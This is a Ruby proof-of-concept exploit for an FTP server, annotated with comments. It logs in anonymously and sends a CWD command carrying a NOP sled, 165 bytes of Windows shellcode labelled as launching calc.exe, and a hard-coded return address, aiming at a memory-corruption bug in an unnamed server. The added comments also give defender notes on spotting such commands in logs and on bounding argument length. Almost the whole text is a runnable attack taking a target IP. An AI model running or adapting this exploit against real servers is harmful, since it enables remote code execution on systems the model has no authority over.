- #!/usr/bin/ruby
# Proof-of-concept FTP client: logs in as anonymous and sends a single CWD command whose
# argument is 272 raw bytes (103 filler + 165 payload + 4 address bytes) instead of a path.
# The paste names no affected server product or version; presumably it targets a
# memory-corruption bug in a server's CWD argument handling -- confirm against the original advisory.
# Defender notes: a CWD argument of this length carrying non-printable bytes and a long run of
# 0x90 is not a legitimate directory name, so it can be matched in FTP command logs or by
# network inspection; the server-side fix is to bound and validate command arguments.
- require 'net/ftp'
- nops = "\x90" * 103 # 103 byte NOP Sled
- # 165 byte payload - windows/exec CMD=calc.exe
# Opaque machine-code bytes (165 by count); per the author's label above they only launch
# calc.exe as a visible demonstration. Not decoded or verified here.
- shellcode = "\xdd\xc1\xd9\x74\x24\xf4\xb8\xb3\xc7\x02\x95\x29\xc9\x5a\xb1\x24"+
- "\x83\xea\xfc\x31\x42\x13\x03\xf1\xd4\xe0\x60\x09\x32\xa0\x8a\xf1"+
- "\xc3\xa2\xce\xcd\x48\xc8\xd5\x55\x4e\xde\x5d\xea\x48\xab\x3d\xd4"+
- "\x69\x40\x88\x9f\x5e\x1d\x0a\x71\xaf\xe1\x94\x21\x54\x21\xd2\x3e"+
- "\x94\x68\x16\x41\xd4\x86\xdd\x7a\x8c\x7c\x1a\x09\xc9\xf6\x7d\xd5"+
- "\x10\xe2\xe4\x9e\x1f\xbf\x63\xff\x03\x3e\x9f\x74\x27\xcb\x5e\x61"+
- "\xd1\x97\x44\x71\x21\x16\x45\x1d\x2e\x19\x75\x58\xf0\xe2\x79\xe9"+
- "\xb1\x1e\x09\x9d\x2d\xb2\x86\x35\x46\x27\x91\x4e\xd6\x07\xa2\x50"+
- "\xd7\xec\xcb\x6c\x88\xc3\xfd\xec\x60\xad\xfa\x6f\x4c\xd6\xaa\x07"+
- "\xbd\xa3\x4f\x88\x55\x2c\xb1\xbc\xa8\x1b\xb1\x27\xd7\xc2\x21\xc4"+
- "\x36\x60\xc2\x6f\x47"
- EIP = "\x7C\x7F\x43\x7E" # 4 bytes appended last; presumably a hard-coded return address (module not named on the page), the kind of fixed value ASLR invalidates
- user = "anonymous" # anonymous login: the script needs no real account to reach the CWD command
- pass = "anonymous"
- payload = "#{nops}#{shellcode}#{EIP}" # filler, then payload bytes, then the 4 address bytes, in that order
- unless ARGV[0] # no target argument given: print usage and exit
- puts "USAGE: exploit <target ip>\n\n"
- exit!
- else
- host = ARGV[0]
- puts "Connecting to #{host}"
- ftp = Net::FTP.open("#{host}") # only the host is passed; no port is specified
- unless ftp # taken only if open returned nil/false
- puts "Could not establish connection"
- exit!
- else
- ftp.sendcmd("user #{user}") # USER/PASS are sent as raw commands via sendcmd
- ftp.sendcmd("pass #{pass}")
- puts "connected to #{host} as user: #{user}"
- puts "sending exploit"
- ftp.sendcmd("cwd #{payload}") # the oversized argument is delivered here, in one CWD command
- end
- ftp.close
- end